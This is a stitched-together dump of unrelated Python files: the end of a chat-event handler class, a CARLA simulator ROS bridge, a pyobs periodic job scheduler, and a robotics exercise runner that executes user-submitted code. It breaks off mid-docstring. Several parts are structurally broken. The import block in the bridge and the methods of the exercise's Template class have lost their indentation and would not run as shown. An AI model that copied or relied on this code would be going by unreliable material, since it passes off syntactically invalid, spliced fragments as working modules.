    def on_avatar_chat_not_declined(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
    def on_delete_message(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
    def on_group_member_join(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
    def on_group_member_leave(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
    def on_chat_invite(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
    def on_chat_background_changed(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
    def on_chat_title_changed(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
    def on_chat_icon_changed(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
    def on_voice_chat_start(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
    def on_video_chat_start(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
    def on_avatar_chat_start(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
    def on_voice_chat_end(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
    def on_video_chat_end(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
    def on_avatar_chat_end(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
    def on_chat_content_changed(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
    def on_screen_room_start(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
    def on_screen_room_end(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
    def on_chat_host_transfered(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
    def on_text_message_force_removed(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
    def on_chat_removed_message(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
    def on_text_message_removed_by_admin(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
    def on_chat_tip(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
    def on_chat_pin_announcement(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
    def on_voice_chat_permission_open_to_everyone(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
    def on_voice_chat_permission_invited_and_requested(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
    def on_voice_chat_permission_invite_only(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
    def on_chat_view_only_enabled(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
    def on_chat_view_only_disabled(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
    def on_chat_unpin_announcement(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
    def on_chat_tipping_enabled(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
    def on_chat_tipping_disabled(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
    def on_timestamp_message(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
    def on_welcome_message(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
    def on_invite_message(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
    def on_user_typing_start(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
    def on_user_typing_end(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
    # Fallback for unmapped frame types; passes the raw dict, not an Event.
    def default(self, data): self.call(getframe(0).f_code.co_name, data)
|
bridge.py
|
#!/usr/bin/env python
#
# Copyright (c) 2018-2020 Intel Corporation
#
# This work is licensed under the terms of the MIT license.
# For a copy, see <https://opensource.org/licenses/MIT>.
#
"""
Rosbridge class:
Class that handle communication between CARLA and ROS
"""
import os
import pkg_resources
try:
import queue
except ImportError:
import Queue as queue
import sys
from distutils.version import LooseVersion
from threading import Thread, Lock, Event
import carla
import ros_compatibility as roscomp
from ros_compatibility.node import CompatibleNode
from carla_ros_bridge.actor import Actor
from carla_ros_bridge.actor_factory import ActorFactory
from carla_ros_bridge.carla_status_publisher import CarlaStatusPublisher
from carla_ros_bridge.debug_helper import DebugHelper
from carla_ros_bridge.ego_vehicle import EgoVehicle
from carla_ros_bridge.world_info import WorldInfo
from carla_msgs.msg import CarlaControl, CarlaWeatherParameters
from carla_msgs.srv import SpawnObject, DestroyObject, GetBlueprints
from rosgraph_msgs.msg import Clock
class CarlaRosBridge(CompatibleNode):
    """
    Carla Ros bridge
    """

    # Pinned CARLA version this bridge was built against; trailing newline
    # stripped. Executed at class-definition time.
    with open(os.path.join(os.path.dirname(__file__), "CARLA_VERSION")) as f:
        CARLA_VERSION = f.read()[:-1]

    # in synchronous mode, if synchronous_mode_wait_for_vehicle_control_command is True,
    # wait for this time until a next tick is triggered.
    VEHICLE_CONTROL_TIMEOUT = 1.

    def __init__(self):
        """
        Constructor
        :param carla_world: carla world object
        :type carla_world: carla.World
        :param params: dict of parameters, see settings.yaml
        :type params: dict
        """
        super(CarlaRosBridge, self).__init__("ros_bridge_node")

    # pylint: disable=attribute-defined-outside-init
    def initialize_bridge(self, carla_world, params):
        """
        Initialize the bridge
        """
        self.parameters = params
        self.carla_world = carla_world

        self.ros_timestamp = roscomp.ros_timestamp()
        self.callback_group = roscomp.callback_groups.ReentrantCallbackGroup()

        self.synchronous_mode_update_thread = None
        self.shutdown = Event()

        self.carla_settings = carla_world.get_settings()
        if not self.parameters["passive"]:
            # workaround: settings can only applied within non-sync mode
            if self.carla_settings.synchronous_mode:
                self.carla_settings.synchronous_mode = False
                carla_world.apply_settings(self.carla_settings)

            self.loginfo("synchronous_mode: {}".format(
                self.parameters["synchronous_mode"]))
            self.carla_settings.synchronous_mode = self.parameters["synchronous_mode"]
            self.loginfo("fixed_delta_seconds: {}".format(
                self.parameters["fixed_delta_seconds"]))
            self.carla_settings.fixed_delta_seconds = self.parameters["fixed_delta_seconds"]
            carla_world.apply_settings(self.carla_settings)

        self.loginfo("Parameters:")
        for key in self.parameters:
            self.loginfo("  {}: {}".format(key, self.parameters[key]))

        # active sync mode in the ros bridge only if CARLA world is configured in sync mode and
        # passive mode is not enabled.
        self.sync_mode = self.carla_settings.synchronous_mode and not self.parameters["passive"]
        if self.carla_settings.synchronous_mode and self.parameters["passive"]:
            self.loginfo(
                "Passive mode is enabled and CARLA world is configured in synchronous mode. This configuration requires another client ticking the CARLA world.")
        self.carla_control_queue = queue.Queue()

        # actor factory
        self.actor_factory = ActorFactory(self, carla_world, self.sync_mode)

        # add world info
        self.world_info = WorldInfo(carla_world=self.carla_world, node=self)
        # add debug helper
        self.debug_helper = DebugHelper(carla_world.debug, self)

        # Communication topics
        self.clock_publisher = self.new_publisher(Clock, 'clock', 10)

        self.status_publisher = CarlaStatusPublisher(
            self.carla_settings.synchronous_mode,
            self.carla_settings.fixed_delta_seconds,
            self)

        # for waiting for ego vehicle control commands in synchronous mode,
        # their ids are maintained in a list.
        # Before tick(), the list is filled and the loop waits until the list is empty.
        self._all_vehicle_control_commands_received = Event()
        self._expected_ego_vehicle_control_command_ids = []
        self._expected_ego_vehicle_control_command_ids_lock = Lock()

        if self.sync_mode:
            self.carla_run_state = CarlaControl.PLAY

            self.carla_control_subscriber = \
                self.new_subscription(CarlaControl, "/carla/control",
                                      lambda control: self.carla_control_queue.put(control.command),
                                      qos_profile=10, callback_group=self.callback_group)

            self.synchronous_mode_update_thread = Thread(
                target=self._synchronous_mode_update)
            self.synchronous_mode_update_thread.start()
        else:
            self.timestamp_last_run = 0.0

            self.actor_factory.start()

            # register callback to update actors
            self.on_tick_id = self.carla_world.on_tick(self._carla_time_tick)

        # services configuration.
        self._registered_actors = []
        self.spawn_object_service = self.new_service(SpawnObject, "/carla/spawn_object",
                                                     self.spawn_object)
        self.destroy_object_service = self.new_service(DestroyObject, "/carla/destroy_object",
                                                       self.destroy_object)

        self.get_blueprints_service = self.new_service(GetBlueprints, "/carla/get_blueprints",
                                                       self.get_blueprints, callback_group=self.callback_group)

        self.carla_weather_subscriber = \
            self.new_subscription(CarlaWeatherParameters, "/carla/weather_control",
                                  self.on_weather_changed, qos_profile=10, callback_group=self.callback_group)

    def spawn_object(self, req, response=None):
        """
        Service handler: spawn the actor described by *req* and register it.

        On failure (or during shutdown) returns id -1 with an error string
        instead of raising, so the service call always completes.
        """
        response = roscomp.get_service_response(SpawnObject)
        if not self.shutdown.is_set():
            try:
                id_ = self.actor_factory.spawn_actor(req)
                self._registered_actors.append(id_)
                response.id = id_
            except Exception as e:
                self.logwarn("Error spawning object '{}': {}".format(req.type, e))
                response.id = -1
                response.error_string = str(e)
        else:
            response.id = -1
            response.error_string = 'Bridge is shutting down, object will not be spawned.'
        return response

    def destroy_object(self, req, response=None):
        """
        Service handler: destroy the actor with id *req.id* and deregister it.
        """
        response = roscomp.get_service_response(DestroyObject)
        destroyed_actors = self.actor_factory.destroy_actor(req.id)
        response.success = bool(destroyed_actors)
        for actor in destroyed_actors:
            if actor in self._registered_actors:
                self._registered_actors.remove(actor)
        return response

    def get_blueprints(self, req):
        """
        Service handler: return the sorted blueprint ids matching *req.filter*
        (all blueprints when the filter is empty), plus pseudo-sensor types.
        """
        response = roscomp.get_service_response(GetBlueprints)
        if req.filter:
            bp_filter = req.filter
        else:
            bp_filter = "*"

        response.blueprints = [
            bp.id for bp in self.carla_world.get_blueprint_library().filter(bp_filter)]
        response.blueprints.extend(self.actor_factory.get_pseudo_sensor_types())
        response.blueprints.sort()
        return response

    def on_weather_changed(self, weather_parameters):
        """
        Callback on new weather parameters
        :return:
        """
        if not self.carla_world:
            return
        self.loginfo("Applying weather parameters...")
        weather = carla.WeatherParameters()
        weather.cloudiness = weather_parameters.cloudiness
        weather.precipitation = weather_parameters.precipitation
        weather.precipitation_deposits = weather_parameters.precipitation_deposits
        weather.wind_intensity = weather_parameters.wind_intensity
        weather.fog_density = weather_parameters.fog_density
        weather.fog_distance = weather_parameters.fog_distance
        weather.wetness = weather_parameters.wetness
        weather.sun_azimuth_angle = weather_parameters.sun_azimuth_angle
        weather.sun_altitude_angle = weather_parameters.sun_altitude_angle
        self.carla_world.set_weather(weather)

    def process_run_state(self):
        """
        process state changes
        """
        command = None

        # get last command
        while not self.carla_control_queue.empty():
            command = self.carla_control_queue.get()

        while command is not None and roscomp.ok():
            self.carla_run_state = command

            if self.carla_run_state == CarlaControl.PAUSE:
                # wait for next command
                self.loginfo("State set to PAUSED")
                self.status_publisher.set_synchronous_mode_running(False)
                # blocking get: stay paused until a new command arrives
                command = self.carla_control_queue.get()
            elif self.carla_run_state == CarlaControl.PLAY:
                self.loginfo("State set to PLAY")
                self.status_publisher.set_synchronous_mode_running(True)
                return
            elif self.carla_run_state == CarlaControl.STEP_ONCE:
                self.loginfo("Execute single step.")
                self.status_publisher.set_synchronous_mode_running(True)
                # re-queue a PAUSE so the next iteration stops again
                self.carla_control_queue.put(CarlaControl.PAUSE)
                return

    def _synchronous_mode_update(self):
        """
        execution loop for synchronous mode
        """
        while not self.shutdown.is_set() and roscomp.ok():
            self.process_run_state()

            if self.parameters['synchronous_mode_wait_for_vehicle_control_command']:
                # fill list of available ego vehicles
                self._expected_ego_vehicle_control_command_ids = []
                with self._expected_ego_vehicle_control_command_ids_lock:
                    for actor_id, actor in self.actor_factory.actors.items():
                        if isinstance(actor, EgoVehicle):
                            self._expected_ego_vehicle_control_command_ids.append(
                                actor_id)

            self.actor_factory.update_available_objects()
            frame = self.carla_world.tick()

            world_snapshot = self.carla_world.get_snapshot()
            self.status_publisher.set_frame(frame)
            self.update_clock(world_snapshot.timestamp)
            self.logdebug("Tick for frame {} returned. Waiting for sensor data...".format(
                frame))
            self._update(frame, world_snapshot.timestamp.elapsed_seconds)
            self.logdebug("Waiting for sensor data finished.")

            if self.parameters['synchronous_mode_wait_for_vehicle_control_command']:
                # wait for all ego vehicles to send a vehicle control command
                if self._expected_ego_vehicle_control_command_ids:
                    if not self._all_vehicle_control_commands_received.wait(CarlaRosBridge.VEHICLE_CONTROL_TIMEOUT):
                        self.logwarn("Timeout ({}s) while waiting for vehicle control commands. "
                                     "Missing command from actor ids {}".format(CarlaRosBridge.VEHICLE_CONTROL_TIMEOUT,
                                                                                self._expected_ego_vehicle_control_command_ids))
                    self._all_vehicle_control_commands_received.clear()

    def _carla_time_tick(self, carla_snapshot):
        """
        Private callback registered at carla.World.on_tick()
        to trigger cyclic updates.

        After successful locking the update mutex
        (only perform trylock to respect bridge processing time)
        the clock and the children are updated.
        Finally the ROS messages collected to be published are sent out.

        :param carla_timestamp: the current carla time
        :type carla_timestamp: carla.Timestamp
        :return:
        """
        if not self.shutdown.is_set():
            # only process each simulation timestamp once
            if self.timestamp_last_run < carla_snapshot.timestamp.elapsed_seconds:
                self.timestamp_last_run = carla_snapshot.timestamp.elapsed_seconds
                self.update_clock(carla_snapshot.timestamp)
                self.status_publisher.set_frame(carla_snapshot.frame)
                self._update(carla_snapshot.frame,
                             carla_snapshot.timestamp.elapsed_seconds)

    def _update(self, frame_id, timestamp):
        """
        update all actors
        :return:
        """
        self.world_info.update(frame_id, timestamp)
        self.actor_factory.update_actor_states(frame_id, timestamp)

    def _ego_vehicle_control_applied_callback(self, ego_vehicle_id):
        """
        Mark *ego_vehicle_id* as having sent its control command; when all
        expected ego vehicles have reported, release the waiting update loop.
        """
        if not self.sync_mode or \
                not self.parameters['synchronous_mode_wait_for_vehicle_control_command']:
            return
        with self._expected_ego_vehicle_control_command_ids_lock:
            if ego_vehicle_id in self._expected_ego_vehicle_control_command_ids:
                self._expected_ego_vehicle_control_command_ids.remove(
                    ego_vehicle_id)
            else:
                self.logwarn(
                    "Unexpected vehicle control command received from {}".format(ego_vehicle_id))
            if not self._expected_ego_vehicle_control_command_ids:
                self._all_vehicle_control_commands_received.set()

    def update_clock(self, carla_timestamp):
        """
        perform the update of the clock

        :param carla_timestamp: the current carla time
        :type carla_timestamp: carla.Timestamp
        :return:
        """
        if roscomp.ok():
            self.ros_timestamp = roscomp.ros_timestamp(carla_timestamp.elapsed_seconds, from_sec=True)
            self.clock_publisher.publish(Clock(clock=self.ros_timestamp))

    def destroy(self):
        """
        Function to destroy this object.
        :return:
        """
        self.loginfo("Shutting down...")
        self.shutdown.set()
        if not self.sync_mode:
            if self.on_tick_id:
                self.carla_world.remove_on_tick(self.on_tick_id)
            self.actor_factory.thread.join()
        else:
            self.synchronous_mode_update_thread.join()
        self.loginfo("Object update finished.")
        self.debug_helper.destroy()
        self.status_publisher.destroy()
        self.destroy_service(self.spawn_object_service)
        self.destroy_service(self.destroy_object_service)
        self.destroy_subscription(self.carla_weather_subscriber)
        # unblock a process_run_state() that may be waiting on the queue
        self.carla_control_queue.put(CarlaControl.STEP_ONCE)

        for uid in self._registered_actors:
            self.actor_factory.destroy_actor(uid)
        self.actor_factory.update_available_objects()
        self.actor_factory.clear()
        super(CarlaRosBridge, self).destroy()
def main(args=None):
    """
    main function for carla simulator ROS bridge
    maintaining the communication client and the CarlaBridge object
    """
    roscomp.init("bridge", args=args)

    carla_bridge = None
    carla_world = None
    carla_client = None
    executor = None
    parameters = {}

    executor = roscomp.executors.MultiThreadedExecutor()
    carla_bridge = CarlaRosBridge()
    executor.add_node(carla_bridge)

    roscomp.on_shutdown(carla_bridge.destroy)

    # read connection and bridge behaviour parameters (with defaults)
    parameters['host'] = carla_bridge.get_param('host', 'localhost')
    parameters['port'] = carla_bridge.get_param('port', 2000)
    parameters['timeout'] = carla_bridge.get_param('timeout', 2)
    parameters['passive'] = carla_bridge.get_param('passive', False)
    parameters['synchronous_mode'] = carla_bridge.get_param('synchronous_mode', True)
    parameters['synchronous_mode_wait_for_vehicle_control_command'] = carla_bridge.get_param(
        'synchronous_mode_wait_for_vehicle_control_command', False)
    parameters['fixed_delta_seconds'] = carla_bridge.get_param('fixed_delta_seconds',
                                                               0.05)
    parameters['register_all_sensors'] = carla_bridge.get_param('register_all_sensors', True)
    parameters['town'] = carla_bridge.get_param('town', 'Town01')
    role_name = carla_bridge.get_param('ego_vehicle_role_name',
                                       ["hero", "ego_vehicle", "hero1", "hero2", "hero3"])
    parameters["ego_vehicle"] = {"role_name": role_name}

    carla_bridge.loginfo("Trying to connect to {host}:{port}".format(
        host=parameters['host'], port=parameters['port']))

    try:
        carla_client = carla.Client(
            host=parameters['host'],
            port=parameters['port'])
        carla_client.set_timeout(parameters['timeout'])

        # check carla version
        dist = pkg_resources.get_distribution("carla")
        if LooseVersion(dist.version) != LooseVersion(CarlaRosBridge.CARLA_VERSION):
            carla_bridge.logfatal("CARLA python module version {} required. Found: {}".format(
                CarlaRosBridge.CARLA_VERSION, dist.version))
            sys.exit(1)

        if LooseVersion(carla_client.get_server_version()) != \
                LooseVersion(carla_client.get_client_version()):
            carla_bridge.logwarn(
                "Version mismatch detected: You are trying to connect to a simulator that might be incompatible with this API. Client API version: {}. Simulator API version: {}"
                .format(carla_client.get_client_version(),
                        carla_client.get_server_version()))

        carla_world = carla_client.get_world()

        # load the requested map (OpenDRIVE file or named town), unless
        # running passively against an externally managed world
        if "town" in parameters and not parameters['passive']:
            if parameters["town"].endswith(".xodr"):
                carla_bridge.loginfo(
                    "Loading opendrive world from file '{}'".format(parameters["town"]))
                with open(parameters["town"]) as od_file:
                    data = od_file.read()
                carla_world = carla_client.generate_opendrive_world(str(data))
            else:
                if carla_world.get_map().name != parameters["town"]:
                    carla_bridge.loginfo("Loading town '{}' (previous: '{}').".format(
                        parameters["town"], carla_world.get_map().name))
                    carla_world = carla_client.load_world(parameters["town"])
            carla_world.tick()

        # NOTE(review): negative percentage presumably makes traffic-manager
        # vehicles exceed the posted speed limit — confirm against the CARLA
        # TrafficManager documentation.
        speed_limit_prc = carla_bridge.get_param('speed_limit_percent', -20)
        carla_bridge.loginfo("Setting speed limit percent to {}".format(speed_limit_prc))
        tm = carla_client.get_trafficmanager()
        tm.global_percentage_speed_difference(speed_limit_prc)

        carla_bridge.initialize_bridge(carla_client.get_world(), parameters)

        carla_bridge.spin()

    except (IOError, RuntimeError) as e:
        carla_bridge.logerr("Error: {}".format(e))
    except KeyboardInterrupt:
        pass
    finally:
        roscomp.shutdown()
        del carla_world
        del carla_client


if __name__ == "__main__":
    main()
|
jobscheduler.py
|
import logging
import threading
import time
from astroplan import Observer
from astropy.time import TimeDelta
import astropy.units as u
from pyobs.comm import Comm
from pyobs.comm.proxy import Proxy
from pyobs.modules import Module
from pyobs.utils.threads import Future
from pyobs.utils.time import Time
log = logging.getLogger(__name__)
class Job:
    """A single scheduled remote call: ``module.method(**params)`` via comm.

    ``id``, ``comm``, ``observer`` and ``abort`` are injected by
    ``JobScheduler.add_job``; subclasses implement ``_schedule_next_run``.
    """

    def __init__(self, module: str, method: str, params: dict = None):
        # filled in by JobScheduler.add_job()
        self.id = None
        self.comm = None
        self.observer = None
        self.abort = None
        # remote target
        self.module = module
        self.method = method
        self.params = {} if params is None else params
        # next execution time; None disables the job
        self.next_run = None

    def __call__(self):
        # before we start, we schedule next run
        self.next_run = self._schedule_next_run()

        # start job in thread
        threading.Thread(target=self._run_job).start()

    def _run_job(self):
        """Execute the remote call, polling for completion/abort, and log the outcome."""
        log.info('Starting job #%d on %s.%s...', self.id, self.module, self.method)
        start = time.time()
        try:
            # get proxy
            proxy: Proxy = self.comm[self.module]

            # call method
            future: Future = proxy.execute(self.method, **self.params)

            # wait for it
            while not future.is_done():
                if self.abort.is_set():
                    # Bug fix: the original omitted the duration argument
                    # (4 placeholders, 3 args) and kept looping, re-logging
                    # the abort every 0.1s — log once and stop waiting.
                    log.error('Aborted job #%d on %s.%s after %.2fs.',
                              self.id, self.module, self.method, time.time() - start)
                    return
                self.abort.wait(0.1)

            # get response and log end of job
            response = future.wait()
            duration = time.time() - start
            log.info('Finished job #%d on %s.%s after %.2fs: %s',
                     self.id, self.module, self.method, duration, str(response))
        except Exception:
            # narrowed from bare except: so SystemExit/KeyboardInterrupt pass through
            log.exception('Failed job #%d on %s.%s.', self.id, self.module, self.method)

    def _schedule_next_run(self) -> Time:
        """Return the time of the next execution; subclasses must override."""
        raise NotImplementedError
class PeriodicJob(Job):
    """Job that repeats at a fixed interval given in s/min/h/days."""

    def __init__(self, seconds: int = None, minutes: int = None, hours: int = None, days: int = None, *args, **kwargs):
        Job.__init__(self, *args, **kwargs)

        # collapse the individual components into one interval in seconds
        components = [(seconds, 1), (minutes, 60), (hours, 3600), (days, 86400)]
        self.interval = sum(value * factor for value, factor in components if value is not None)

        # first run happens immediately
        self.next_run = Time.now()

    def _schedule_next_run(self) -> Time:
        """Return now + interval, or an empty Time for a zero interval."""
        if not self.interval:
            return Time()
        return Time.now() + TimeDelta(self.interval * u.second)
class JobScheduler(Module):
    """Job scheduler."""
    __module__ = 'pyobs.modules.utils'

    def __init__(self, *args, **kwargs):
        """Initialize a new job scheduler."""
        Module.__init__(self, *args, **kwargs)

        # ID handed out to the most recently registered job
        self.last_id = 0
        # registered jobs
        self.jobs = []

    def open(self):
        """Open module"""
        Module.open(self)
        self.add_job(PeriodicJob(module='camera', method='get_binning', seconds=10))

    def main(self):
        """Main loop for application."""
        while not self.closing.is_set():
            # trigger every job whose scheduled time has passed
            now = Time.now()
            due = [job for job in self.jobs
                   if job.next_run is not None and now > job.next_run]
            for job in due:
                job()

            # sleep a little
            self.closing.wait(1)

    def add_job(self, job: Job):
        """Register *job* and wire it up with this module's context."""
        self.last_id += 1
        job.id = self.last_id
        job.comm = self.comm
        job.observer = self.observer
        job.abort = self.closing
        self.jobs.append(job)


__all__ = ['JobScheduler']
|
exercise.py
|
#!/usr/bin/env python
from __future__ import print_function
from websocket_server import WebsocketServer
import socket
import json
import time
import threading
import sys
from datetime import datetime
import re
import importlib
import cv2
from gui import GUI, ThreadGUI
from hal import HAL
from console import start_console, close_console
class Template:
# Initialize class variables
# self.time_cycle to run an execution for atleast 1 second
# self.process for the current running process
def __init__(self):
    """Set up execution state and the HAL/GUI back-ends.

    Expects the websocket host address as the first CLI argument
    (``sys.argv[1]``).
    """
    self.thread = None
    # set to True to stop the user-code execution loop (see process_code)
    self.reload = False
    # Time variables: target/measured cycle time in milliseconds
    self.time_cycle = 80
    self.ideal_cycle = 80
    self.iteration_counter = 0
    self.frequency_message = {'brain': '', 'gui': ''}
    self.server = None
    self.client = None
    self.host = sys.argv[1]
    # Initialize the GUI, WEBRTC and Console behind the scenes
    # (HAL must exist before the GUI, which takes it as a dependency)
    self.hal = HAL()
    self.gui = GUI(self.host, self.hal)
    # Client Socket to connect with the person model server
    # (UDP; presumably a local inference service — TODO confirm)
    self.model_address = ("127.0.0.1", 36677)
    self.model_client = socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)
# Function for saving
def save_code(self, source_code):
    """Persist the user's source code to the on-disk slot used by #save/#load."""
    with open('code/academy.py', 'w') as fh:
        fh.write(source_code)
# Function for loading
def load_code(self):
    """Return the user's source code previously stored by save_code."""
    with open('code/academy.py', 'r') as fh:
        return fh.read()
# Function to parse the code
# A few assumptions:
# 1. The user always passes sequential and iterative codes
# 2. Only a single infinite loop
def parse_code(self, source_code):
    """Split an incoming client message into (iterative, sequential, debug_level).

    Messages starting with "#save"/"#load" are handled as commands and
    return empty code with debug level 1.  Otherwise the message is
    assumed to carry a fixed-width header before the actual code
    (presumably "#code<level>..." with the payload at offset 12 —
    TODO confirm against the client protocol).
    """
    # Check for save/load
    if(source_code[:5] == "#save"):
        source_code = source_code[5:]
        self.save_code(source_code)
        return "", "", 1
    elif(source_code[:5] == "#load"):
        source_code = source_code + self.load_code()
        self.server.send_message(self.client, source_code)
        return "", "", 1
    else:
        try:
            # Get the debug level (single digit at index 5) and strip the header
            debug_level = int(source_code[5])
            source_code = source_code[12:]
        except:
            # NOTE(review): bare except also masks unrelated errors; on any
            # failure the code is discarded and level defaults to 1
            debug_level = 1
            source_code = ""
        source_code = self.debug_parse(source_code, debug_level)
        sequential_code, iterative_code = self.seperate_seq_iter(source_code)
        # NOTE: returns (iterative, sequential) — reversed w.r.t. seperate_seq_iter
        return iterative_code, sequential_code, debug_level
# Function to parse code according to the debugging level
def debug_parse(self, source_code, debug_level):
    """Strip every GUI.* statement from the code when debug_level is 1.

    NOTE(review): the original comment said level 0, but the check is for
    level 1 — behavior preserved as-is; confirm the intended semantics.
    """
    if debug_level == 1:
        # drop each line's 'GUI.'-prefixed call ('.*' stops at the newline)
        return re.sub(r'GUI\..*', '', source_code)
    return source_code
# Function to seperate the iterative and sequential code
def seperate_seq_iter(self, source_code):
    """Split user code into (sequential_code, iterative_code) around `while True:`.

    The regex requires a non-blank character before `while` (normally the
    preceding newline), so that character is part of the match and ends up
    at the start of the iterative part. A `while True:` at the very start
    of the string is therefore not detected — observed original behavior,
    preserved here.
    """
    if source_code == "":
        return "", ""
    # Search for an instance of while True / while(True)
    infinite_loop = re.search(r'[^ \t]while\(True\):|[^ \t]while True:', source_code)
    # FIX: the original used a bare `except:` to catch `.start()` on None,
    # which also swallowed any unrelated error. Test explicitly instead.
    if infinite_loop is None:
        # No iterative section: everything runs once.
        return source_code, ""
    start_index = infinite_loop.start()
    iterative_code = source_code[start_index:]
    sequential_code = source_code[:start_index]
    # Remove the `while True:` syntax and dedent the loop body by one
    # level (4 spaces per line).
    iterative_code = re.sub(r'[^ ]while\(True\):|[^ ]while True:', '', iterative_code)
    iterative_code = re.sub(r'^[ ]{4}', '', iterative_code, flags=re.M)
    return sequential_code, iterative_code
# The process function
def process_code(self, source_code):
    """Execute user code: the sequential part once, then the iterative part
    in a rate-limited loop until self.reload is raised by a new submission.
    """
    # Redirect output to the web console (start_console defined elsewhere)
    start_console()
    iterative_code, sequential_code, debug_code_level = self.parse_code(source_code)
    # Whatever the code is, first step is to just stop the robot!
    self.hal.motors.sendV(0)
    self.hal.motors.sendW(0)
    # Build the synthetic HAL/GUI modules and run the sequential part once
    gui_module, hal_module = self.generate_modules()
    reference_environment = {"GUI": gui_module, "HAL": hal_module}
    exec(sequential_code, reference_environment)
    # Run the iterative part, pacing iterations to self.time_cycle ms each
    while self.reload == False:
        start_time = datetime.now()
        # Execute the iterative portion
        exec(iterative_code, reference_environment)
        # Wall-clock duration of this iteration in milliseconds
        finish_time = datetime.now()
        dt = finish_time - start_time
        ms = (dt.days * 24 * 60 * 60 + dt.seconds) * 1000 + dt.microseconds / 1000.0
        # Keep updating the iteration counter (read by measure_frequency)
        if (iterative_code == ""):
            self.iteration_counter = 0
        else:
            self.iteration_counter = self.iteration_counter + 1
        # If the iteration finished early, sleep the rest of the time slice
        if (ms < self.time_cycle):
            time.sleep((self.time_cycle - ms) / 1000.0)
    close_console()
    print("Current Thread Joined!")
# Function to generate the modules for use in ACE Editor
def generate_modules(self):
    """Build the synthetic HAL/GUI modules that user code sees in exec().

    Returns (gui_module, hal_module); both are also registered in
    sys.modules so `import HAL` / `import GUI` work inside user code.
    """
    # Define HAL module (an empty module object we attach functions to)
    hal_module = importlib.util.module_from_spec(importlib.machinery.ModuleSpec("HAL", None))
    hal_module.HAL = importlib.util.module_from_spec(importlib.machinery.ModuleSpec("HAL", None))
    # Expose the HAL API surface to user code
    hal_module.HAL.setV = self.hal.setV
    hal_module.HAL.setW = self.hal.setW
    hal_module.HAL.getLaserData = self.hal.getLaserData
    hal_module.HAL.getPose3d = self.hal.getPose3d
    hal_module.HAL.getImage = self.hal.getImage
    hal_module.HAL.getBoundingBoxes = self.hal.getBoundingBoxes
    # Define GUI module
    gui_module = importlib.util.module_from_spec(importlib.machinery.ModuleSpec("GUI", None))
    gui_module.GUI = importlib.util.module_from_spec(importlib.machinery.ModuleSpec("GUI", None))
    # Expose the GUI API surface
    gui_module.GUI.showImage = self.gui.showImage
    # Register in sys.modules. Protip: the names should be different from
    # other (real) modules, otherwise imports resolve to the wrong thing.
    sys.modules["HAL"] = hal_module
    sys.modules["GUI"] = gui_module
    return gui_module, hal_module
# Function to measure the frequency of iterations
def measure_frequency(self):
    """Every 2 s, publish the mean iteration period (ms) in self.ideal_cycle.

    Runs until self.reload is raised; resets self.iteration_counter after
    each measurement window.
    """
    previous_time = datetime.now()
    # An infinite loop, stopped by the reload flag
    while self.reload == False:
        # Sleep for 2 seconds between samples
        time.sleep(2)
        # Real elapsed interval since the previous sample
        current_time = datetime.now()
        dt = current_time - previous_time
        ms = (dt.days * 24 * 60 * 60 + dt.seconds) * 1000 + dt.microseconds / 1000.0
        previous_time = current_time
        # Mean period = window length / iterations completed in the window.
        # FIX: catch only ZeroDivisionError (consistent with
        # send_frequency_message) instead of the original bare `except:`.
        try:
            self.ideal_cycle = ms / self.iteration_counter
        except ZeroDivisionError:
            # No iterations ran in this window (e.g. empty iterative code)
            self.ideal_cycle = 0
        # Reset the counter for the next window
        self.iteration_counter = 0
# Function to generate and send frequency messages
def send_frequency_message(self):
    """Compute brain/GUI loop frequencies (Hz) and push them to the client."""
    # A measured cycle of 0 ms means "no data yet"; report 0 Hz in that case.
    try:
        brain_frequency = round(1000 / self.ideal_cycle, 1)
    except ZeroDivisionError:
        brain_frequency = 0
    try:
        gui_frequency = round(1000 / self.thread_gui.ideal_cycle, 1)
    except ZeroDivisionError:
        gui_frequency = 0
    self.frequency_message["brain"] = brain_frequency
    self.frequency_message["gui"] = gui_frequency
    payload = "#freq" + json.dumps(self.frequency_message)
    self.server.send_message(self.client, payload)
# Function to maintain thread execution
def execute_thread(self, source_code):
    """Stop any running user-code threads, then start fresh ones.

    The caller must have set self.reload = True beforehand so the old
